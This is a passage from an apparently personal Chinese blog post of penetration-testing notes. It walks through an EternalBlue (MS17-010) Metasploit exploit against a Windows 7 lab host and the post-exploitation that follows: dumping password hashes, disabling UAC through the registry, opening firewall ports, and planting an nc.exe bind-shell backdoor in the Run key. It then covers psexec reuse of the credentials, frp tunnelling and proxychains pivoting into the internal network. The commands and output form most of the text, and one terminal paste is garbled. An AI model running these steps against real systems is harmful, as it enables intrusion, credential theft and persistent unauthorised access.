192.168.1.148:445 - 0x00000010  61 73 69 63 20 37 36 30 30                       asic 7600       </span><br><span class="line">[+] 192.168.1.148:445 - Target arch selected valid for arch indicated by DCE/RPC reply</span><br><span class="line">[*] 192.168.1.148:445 - Trying exploit with 12 Groom Allocations.</span><br><span class="line">[*] 192.168.1.148:445 - Sending all but last fragment of exploit packet</span><br><span class="line">[*] 192.168.1.148:445 - Starting non-paged pool grooming</span><br><span class="line">[+] 192.168.1.148:445 - Sending SMBv2 buffers</span><br><span class="line">[+] 192.168.1.148:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.</span><br><span class="line">[*] 192.168.1.148:445 - Sending final SMBv2 buffers.</span><br><span class="line">[*] 192.168.1.148:445 - Sending last fragment of exploit packet!</span><br><span class="line">[*] 192.168.1.148:445 - Receiving response from exploit packet</span><br><span class="line">[+] 192.168.1.148:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!</span><br><span class="line">[*] 192.168.1.148:445 - Sending egg to corrupted connection.</span><br><span class="line">[*] 192.168.1.148:445 - Triggering free of corrupted buffer.</span><br><span class="line">[*] Sending stage (200262 bytes) to 192.168.1.148</span><br><span class="line">[*] Meterpreter session 2 opened (192.168.1.11:4444 -&gt; 192.168.1.148:49172 ) at 2022-05-16 22:39:29 +0800</span><br><span class="line">[+] 192.168.1.148:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=</span><br><span class="line">[+] 192.168.1.148:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=</span><br><span class="line">[+] 192.168.1.148:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h4 id="step-4-后门操作"><a href="#step-4-后门操作" class="headerlink" title="step 4.后门操作"></a>step 4.后门操作</h4><p>1.查看用户权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; getuid</span><br><span class="line">Server username: NT AUTHORITY\SYSTEM</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>windows 三类权限</p>
<p>system &gt; administrator &gt; guest		当前拿到的是win7的最高权限</p>
<p>2.创建一个新用户来远程连接win7桌面</p>
<p>RDP(Remote Desktop Protocol) 概述：远程桌面协议是一个多通道(multi-channel)的协议，让用户（客户端或称“本地电脑”）连上微软终端机服务的电脑(服务端或称“远程电脑”)</p>
<p>开启远程桌面连接</p>
<p>用到后渗透攻击模块（当前已经拿到用户权限了）</p>
<p>run post&#x2F;windows&#x2F;mange 	#敲击命令逻辑 post(后渗透)  windows(平台) manage(类型)</p>
<p>run post&#x2F;windows&#x2F;manage&#x2F;enable_rdp	后渗透攻击模块，开启远程桌面</p>
<p>创建用户名&#x2F;密码</p>
<p>run post&#x2F;windows&#x2F;manage&#x2F;enable_rdp USERNAME&#x3D;root PASSWORD&#x3D;123456</p>
<h4 id="step-5关闭主机防护策略，并开启后门（维持权限访问）"><a href="#step-5关闭主机防护策略，并开启后门（维持权限访问）" class="headerlink" title="step .5关闭主机防护策略，并开启后门（维持权限访问）"></a>step .5关闭主机防护策略，并开启后门（维持权限访问）</h4><p>通过ms17-010永恒之蓝获取到的shell可能会出现操作受限的情况，所以我们使用主机的账户信息建立session进行连接。</p>
<p>C:\Windows\System32\config\SAM	保存着主机的账户&#x2F;密码信息</p>
<p>hashdump 拿到账号和密码的哈希值（拿来建立session）</p>
<p>想建立session，需要开启某个端口，考虑到防火墙的存在，需要添加防火墙规则</p>
<p>netsh firewall add portopening TCP 4444 “root” ENABLE ALL				创建一条规则，允许4444端口访问网络</p>
<p>step .6 关闭主机的用户账户控制</p>
<p>UAC(User Account Control):是微软在操作系统中的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权，以达到帮助阻止恶意程序损坏系统的效果。</p>
<p>修改注册表，关闭UAC</p>
<p>cmd.exe &#x2F;k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System &#x2F;v EnableLUA &#x2F;t REG_DWORD &#x2F;d 0 &#x2F;f</p>
<p>必须关闭UAC,否则使用账户信息创建连接会失败</p>
<p>开启win7主机的文件共享（修改注册表），也方便黑客利用这个功能远程修改命令</p>
<p>cmd.exe &#x2F;k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System &#x2F;v LocalAccountTokenFilterPolicy &#x2F;t REG_DWORD &#x2F;d 1 &#x2F;f</p>
<p>先将session放到后台 background</p>
<p>扩展：psexec实用程序需要在远程系统上需要做一些事情：SMB 消息块协议(SMB）必须可用，并且可以访问；必须启用文件和打印共享，Admin$必须可以访问，它是一个隐藏的SMB共享，它映射到windows目录，用于软件部署。体哦那个psexec实用程序的凭据必须具有访问Admin$共享的权限。psexec可执行文件内部有windows服务镜像，它接受此服务，并将其部署到远程计算机的Admin$共享中，然后他使用SMB上的DCE&#x2F;RPC(分布式计算环境&#x2F;远程环境调用)接口来访问Windows Service Control Manager API,他将打开远程计算机上的psexec程序，然后psexec程序创建一个可用于将命令发送到系统的命名管道，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msf6 exploit(windows/smb/ms17_010_eternalblue) &gt; use exploit/windows/smb/psexec</span><br><span class="line">[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp</span><br><span class="line">msf6 exploit(windows/smb/psexec) &gt; </span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>修改参数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">msf6 exploit(windows/smb/psexec) &gt; set RHOSTS 192.168.1.148</span><br><span class="line">RHOSTS =&gt; 192.168.1.148</span><br><span class="line">msf6 exploit(windows/smb/psexec) &gt; set SMBUSER root</span><br><span class="line">SMBUSER =&gt; root</span><br><span class="line">msf6 exploit(windows/smb/psexec) &gt; set SMBPASS 123456</span><br><span class="line">SMBPASS =&gt; 123456</span><br><span class="line">msf6 exploit(windows/smb/psexec) &gt; show options</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>注意，此处用户账号&#x2F;密码必须设置！用户组，如果主机在用户组中，必须设置。</p>
<p>session创建后，通过sysinfo可以查看主机是否在域中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">meterpreter &gt; sysinfo</span><br><span class="line">Computer        : WIN-M2F2TMRU139</span><br><span class="line">OS              : Windows 7 (6.1 Build 7600).</span><br><span class="line">Architecture    : x64</span><br><span class="line">System Language : zh_CN</span><br><span class="line">Domain          : WORKGROUP</span><br><span class="line">Logged On Users : 4</span><br><span class="line">Meterpreter     : x86/windows</span><br><span class="line">meterpreter &gt; </span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Domain :WORKGROUP	值为工作组，不在域中</p>
<p><strong>下面我们配置一个后门程序，修改UAC的注册表，需要重启才能生效</strong></p>
<p><strong>nc</strong></p>
<p>上传系统内置的nc.exe到远程主机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; upload /usr/share/windows-binaries/nc.exe C:\\Windows\\</span><br><span class="line">[*] uploading  : /usr/share/windows-binaries/nc.exe -&gt; C:\Windows\</span><br><span class="line">[*] uploaded   : /usr/share/windows-binaries/nc.exe -&gt; C:\Windows\\nc.exe</span><br><span class="line">meterpreter &gt; </span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>修改注册表，将nc后门加入到注册表中</p>
<p>注册表添加启动项执行nc 反弹shell命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc_listen -d &quot;C:\Windows\nc.exe -Ldp 443 -e cmd.exe&quot;</span><br></pre></td></tr></table></figure>



<p>开机启动参数说明</p>
<p>-L:表示用户断开连接后重新进行端口侦听</p>
<p>-d:表示后台运行</p>
<p>-p:监听端口</p>
<p>-e prog 程序重定向，一旦建立连接，就执行</p>
<h4 id="step-6-建立开启后台侦听端口的防火墙规则"><a href="#step-6-建立开启后台侦听端口的防火墙规则" class="headerlink" title="step .6 建立开启后台侦听端口的防火墙规则"></a>step .6 建立开启后台侦听端口的防火墙规则</h4><p>C:\Windows&gt;netsh firewall add portopening TCP 443 “nc_liaten” Enable ALL<br>netsh firewall add portopening TCP 443 “nc_liaten” Enable ALL</p>
<p>IMPORTANT: Command executed successfully.<br>However, “netsh firewall” is deprecated;<br>use “netsh advfirewall firewall” instead.<br>For more information on using “netsh advfirewall firewall” commands<br>instead of “netsh firewall”, see KB article 947709<br>at <a target="_blank" rel="noopener" href="http://go.microsoft.com/fwlink/?linkid=121488">http://go.microsoft.com/fwlink/?linkid=121488</a> .</p>
<p>Ok.</p>
<h3 id="Part-2-frp内网穿透"><a href="#Part-2-frp内网穿透" class="headerlink" title="Part 2 frp内网穿透"></a>Part 2 frp内网穿透</h3><p>服务端设置</p>
<p>[root@VM-8-12-centos ~]# rz -b</p>
<p>[root@VM-8-12-centos <del>]# md<br>md5sum    mdadm     mdel      mdeltree  mdir      mdmon     mdu<br>[root@VM-8-12-centos ~]# md<br>md5sum    mdadm     mdel      mdeltree  mdir      mdmon     mdu<br>[root@VM-8-12-centos ~]# md5sum &#x2F;root&#x2F;<br>5V}P櫓%1¿&#x3D;þ񴓧9ʶı¿{PpضqE󳇳󿞠.bashrc                                 .local&#x2F;                                 thinclient_drives&#x2F;<br>-7P                                    .cache&#x2F;                                 .pip&#x2F;                                   .viminfo<br>.bash_history                           .cshrc                                  .pydistutils.cfg                        .vnc&#x2F;<br>.bash_logout                            f򂭪eW贻+d1@ɪ</del>                 .ssh&#x2F;                                   .Xauthority<br>.bash_profile                           frp_0.43.0_linux_amd64.tar.gz           .tcshrc                                 .xsession-errors<br>[root@VM-8-12-centos <del>]# md5sum &#x2F;root&#x2F;<br>5V}P櫓%1¿&#x3D;þ񴓧9ʶı¿{PpضqE󳇳󿞠.bashrc                                 .local&#x2F;                                 thinclient_drives&#x2F;<br>-7P                                    .cache&#x2F;                                 .pip&#x2F;                                   .viminfo<br>.bash_history                           .cshrc                                  .pydistutils.cfg                        .vnc&#x2F;<br>.bash_logout                            f򂭪eW贻+d1@ɪ</del>                 .ssh&#x2F;                                   .Xauthority<br>.bash_profile                           frp_0.43.0_linux_amd64.tar.gz           .tcshrc                                 .xsession-errors<br>[root@VM-8-12-centos ~]# md5sum &#x2F;root&#x2F;frp_0.43.0_linux_amd64.tar.gz<br>9581f0c261d64b3f5b9762d6b9b9802d  &#x2F;root&#x2F;frp_0.43.0_linux_amd64.tar.gz<br>[root@VM-8-12-centos ~]# sha256<br>sha256hmac  sha256sum<br>[root@VM-8-12-centos ~]# sha256<br>sha256hmac  sha256sum<br>[root@VM-8-12-centos ~]# sha256sum &#x2F;root&#x2F;frp_0.43.0_linux_amd64.tar.gz<br>d458d70dd88048d1fc898d5422ed570e912d3f3ef3ee5928871438a08514f725  &#x2F;root&#x2F;frp_0.43.0_linux_amd64.tar.gz<br>[root@VM-8-12-centos ~]# tar -zxvf frp_0.43.0_linux_amd64.tar.gz<br>frp_0.43.0_linux_amd64&#x2F;<br>frp_0.43.0_linux_amd64&#x2F;frpc_full.ini<br>frp_0.43.0_linux_amd64&#x2F;frpc.ini<br>frp_0.43.0_linux_amd64&#x2F;frps_full.ini<br>frp_0.43.0_linux_amd64&#x2F;LICENSE<br>frp_0.43.0_linux_amd64&#x2F;frpc<br>frp_0.43.0_linux_amd64&#x2F;frps<br>frp_0.43.0_linux_amd64&#x2F;frps.ini<br>[root@VM-8-12-centos ~]# cd frp_0.43.0_linux_amd64&#x2F;<br>[root@VM-8-12-centos frp_0.43.0_linux_amd64]# ls<br>frpc  frpc_full.ini  frpc.ini  frps  frps_full.ini  frps.ini  LICENSE<br>[root@VM-8-12-centos frp_0.43.0_linux_amd64]# </p>
<p>查看配置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"> cat frps.ini </span><br><span class="line">[common]</span><br><span class="line">bind_port = 7000</span><br><span class="line">[root@VM-8-12-centos frp_0.43.0_linux_amd64]# </span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>启动</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">./frps -c ./frps.ini </span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h3 id="part-3-内网web服务"><a href="#part-3-内网web服务" class="headerlink" title="part 3 内网web服务"></a>part 3 内网web服务</h3><p>服务端配置 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">bind_port = 7000</span><br><span class="line">vhost_http_port = 80</span><br><span class="line">dashboard_port = 7100</span><br><span class="line">dashboard_user = admin</span><br><span class="line">dashboard_port = admin</span><br><span class="line">authentication_method = token</span><br><span class="line">token = Szh168</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>说明：</p>
<p>vhost_http_port :web映射服务端启用虚拟主机端口</p>
<p>dash* 仪表盘配置</p>
<p>authentication_method :防止外网frp服务端被滥用采用认证方式</p>
<p>token： token认证的value</p>
<p>客户端配置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">server_addr = 175.178.254.75</span><br><span class="line">server_port = 7000</span><br><span class="line">token = Szh168</span><br><span class="line"></span><br><span class="line">[web01]</span><br><span class="line">type = http</span><br><span class="line">local_port = 80</span><br><span class="line">custom_domains = centos.thaygo.cc</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>server_addr &#x3D; 175.178.254.75 外网frp地址</p>
<p>token &#x3D; Szh168 :frp服务端的token，必须与外网服务端一致，才能认证通过</p>
<p>custom_domains :访问内网客户端使用的域名</p>
<p>注意：web映射，必须使用域名访问才能访问成功</p>
<p>因此想要访问内网web，需要在浏览器端修改hosts文件</p>
<p>如果是windows系统</p>
<p>修改C:\windows\system32\drivers\etc目录下的hosts文件</p>
<p>添加如下字段：</p>
<p>175.178.254.75  centos.thaygo.cc</p>
<h4 id="part4-使用msf自带的代理功能实现内网渗透"><a href="#part4-使用msf自带的代理功能实现内网渗透" class="headerlink" title="part4 使用msf自带的代理功能实现内网渗透"></a>part4 使用msf自带的代理功能实现内网渗透</h4><p>step 1:</p>
<p>靶机有外网ip和内网ip两个网口，通过外网ip获取后门连接后，实现内网渗透</p>
<p>生成后门payload ,获取到靶机权限，然后使用后渗透攻击命令获取内网</p>
<p>run get_local_subnets</p>
<p>run autoroute -s 192.168.1.0&#x2F;24 内网路由</p>
<p>run autoroute -p 查看路由信息</p>
<p>background</p>
<p>使用msf自带的代理插件 use auxilliary&#x2F;server&#x2F;socks_proxy</p>
<p>set SRVHOST  kali的ip</p>
<p>修改代理的配置文件&#x2F;etc&#x2F;proxychains4.com</p>
<p>注释掉 #proxy_dns</p>
<p>修改默认代理为我们刚才配置的代理</p>
<p>socks5 kali ip  1080</p>
<p>使用代理扫描内网主机</p>
<p>proxychains4 nmap -Pn -sT -p 445 –script&#x3D;smb-vuln-ms17-010.nse 192.168.1.0&#x2F;24</p>
<p>使用代理启动msf</p>
<p>proxychains4 msfdb run</p>
<p>开启内网远程桌面映射到kali</p>
<p>portfwd add -L kaliip -l 2323  -p 3389 -r 内网ip</p>
<p>plugin &#x3D; socks5</p>
<p>remote_port&#x3D;1234</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2022/06/21/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" data-id="cl4n1j915000494uge7n0douc" data-title="" class="article-share-link">Share</a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2022/06/20/nginx-with-rtmp-buiding/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">nginx with rtmp buiding</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/version-0-1-0/" rel="tag">version 0.1.0</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/version-0-1-0/" style="font-size: 10px;">version 0.1.0</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/06/">June 2022</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/06/21/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">(no title)</a>
          </li>
        
          <li>
            <a href="/2022/06/20/nginx-with-rtmp-buiding/">nginx with rtmp buiding</a>
          </li>
        
          <li>
            <a href="/2022/06/20/%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E7%AF%87blog/">我的第一篇blog</a>
          </li>
        
          <li>
            <a href="/2022/06/19/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2022 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>